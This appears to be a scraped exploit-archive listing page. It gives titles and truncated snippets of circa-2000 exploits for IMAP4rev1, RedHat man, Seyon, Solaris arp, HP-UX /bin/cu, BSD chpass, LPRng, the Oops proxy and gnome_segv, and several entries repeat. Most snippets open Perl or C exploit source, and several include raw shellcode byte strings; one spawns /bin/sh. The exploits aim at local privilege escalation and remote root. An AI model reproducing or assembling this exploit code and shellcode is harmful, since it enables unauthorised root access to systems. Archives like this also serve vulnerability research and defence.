IMAP4rev1 10.190 Authentication Stack Overflow Exploit

Exploit for linux platform in category remote exploits ====================================================== IMAP4rev1 10.190 Authentication Stack Overflow Exploit ====================================================== !/usr/bin/perl Successfully tested on IMAP4rev1 v10.190 Written by:...

IMAP4rev1 10.190 - Authentication Stack Overflow

!/usr/bin/perl Successfully tested on IMAP4rev1 v10.190 Written by: [email protected] / anno 2000 This is nothing new - just wrote it for fun. $shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80". "\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89"...

RedHat 6.1 - man Local Overflow Local Privilege Escalation

RedHat 6.1 - man Local Overflow Local Privilege Escalation !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"...

Debian 2.2 - splitvt Format String

Debian 2.2 - splitvt Format String // source: https://www.securityfocus.com/bid/2210/info splitvt is a VT100 window splitter, designed to allow the user two command line interfaces in one terminal window, originally written by Sam Lantinga. It is freely available, open source, and included with...

Seyon 2.1 rev. 4b i586-Linux (RedHat 4.05.1) - Local Overflow

Seyon 2.1 rev. 4b i586-Linux RedHat 4.05.1 - Local Overflow !/usr/bin/perl c Copyright [email protected] / anno domani 2000 Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux Tested on: RedHat 4.0/5.1 Greets: scrippie, @HWA, grazer, mixter, pr0ix, s\ http://www.digit-labs.org/ ||...

Solaris 78-beta - ARP Local Overflow

Solaris 78-beta - ARP Local Overflow / arp overflow proof of concept by [email protected] shellcode originally written by Cheez Whiz. tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 / long getesp asm"movl %esp,%eax"...

Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow

!/usr/bin/perl c Copyright [email protected] / anno domani 2000 Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux Tested on: RedHat 4.0/5.1 Greets: scrippie, @HWA, grazer, mixter, pr0ix, s\ http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". / jmp 0x1f / "\x5e". ...

Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux

Exploit for linux platform in category local exploits ===================================================== Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux ===================================================== !/usr/bin/perl c Copyright email protected / anno domani 2000 Seyon Exploit /...

Solaris 7/8-beta - ARP Local Overflow

/ arp overflow proof of concept by [email protected] shellcode originally written by Cheez Whiz. tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 / long getesp asm"movl %esp,%eax"; int mainint ac, char av char shell ...

Solaris 7 / 8-beta arp Local Overflow Exploit

Exploit for solaris platform in category local exploits ============================================= Solaris 7 / 8-beta arp Local Overflow Exploit ============================================= / arp overflow proof of concept by email protected shellcode originally written by Cheez Whiz. tested o...

HP-UX 11.0 - bincu Local Privilege Escalation

HP-UX 11.0 - bincu Local Privilege Escalation / Copyright c 2001 Zorgon All Rights Reserved The copyright notice above does not evidence any actual or intended publication of such source code. HP-UX /bin/cu exploit. Tested on HP-UX 11.00 [email protected] http://www.nightbird.free.fr / includ...

HP-UX 11.0 - '/bin/cu' Local Privilege Escalation

/ Copyright c 2001 Zorgon All Rights Reserved The copyright notice above does not evidence any actual or intended publication of such source code. HP-UX /bin/cu exploit. Tested on HP-UX 11.00 [email protected] http://www.nightbird.free.fr / include include include include define LEN 9778 defi...

HP-UX 11.0 /bin/cu Privilege Escalation Exploit

Exploit for hp-ux platform in category local exploits =============================================== HP-UX 11.0 /bin/cu Privilege Escalation Exploit =============================================== / Copyright c 2001 Zorgon All Rights Reserved The copyright notice above does not evidence any actu...

BSD chpass - 'pw_error(3)' Local Privilege Escalation

/ TESO BSD chpass exploit - caddis greets: !teso, !w00w00, hert!, ozsecurity, plus613 / include char bsdshellcode = "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" "\x4e\x08\x89\x46\x0c\x8d\x4e\x08" "\x50\x51\x56\x50\xb0\x3b\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; char ptmpshellcode =...

BSD chpass - pw_error(3) Local Privilege Escalation

BSD chpass - pwerror3 Local Privilege Escalation / TESO BSD chpass exploit - caddis greets: !teso, !w00w00, hert!, ozsecurity, plus613 / include char bsdshellcode = "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" "\x4e\x08\x89\x46\x0c\x8d\x4e\x08" "\x50\x51\x56\x50\xb0\x3b\xcd\x80"...

BSD chpass (pw_error(3)) Local Root Exploit

Exploit for bsd platform in category local exploits =========================================== BSD chpass pwerror3 Local Root Exploit =========================================== / TESO BSD chpass exploit - caddis greets: !teso, !w00w00, hert!, ozsecurity, plus613 / include char bsdshellcode =...

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)

Linux/x86 - Audio knock knock knock via /dev/dsp + setreuid0,0 + execve Shellcode 566 bytes. Shellcode exploit for Linuxx86 platform / Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected]...

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow /--oopz.c---//-------------r-3-m-0-t-3---------------\------------- TARGET : oops-1.4.6 one russi4n proxy-server CLASS : remote 0S : FreeBSD 4.0 - 2 AUTH0R : diman VEND0R : wanna payment for support. I'm not doing his job, yeh? DATE :...

LPRng 3.6.222324 - Remote Command Execution

LPRng 3.6.222324 - Remote Command Execution / LPRng remote root exploit for x86 Linux 9/27/00 - sk8 tested on compiled LPRng 3.6.22/23/24 / include include char sc= "\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff" "\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39...

gnome_segv - Local Buffer Overflow

/ gnomesegv local buffer overflow. Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/9/2000 This exploit was coded at overfiens in cali. Shouts to overfien and skeptik... h00t h00t. Bug found by skeptik. Tested on SuSE 6.4/2.2.14 non sid by default, p.o.e. only. ...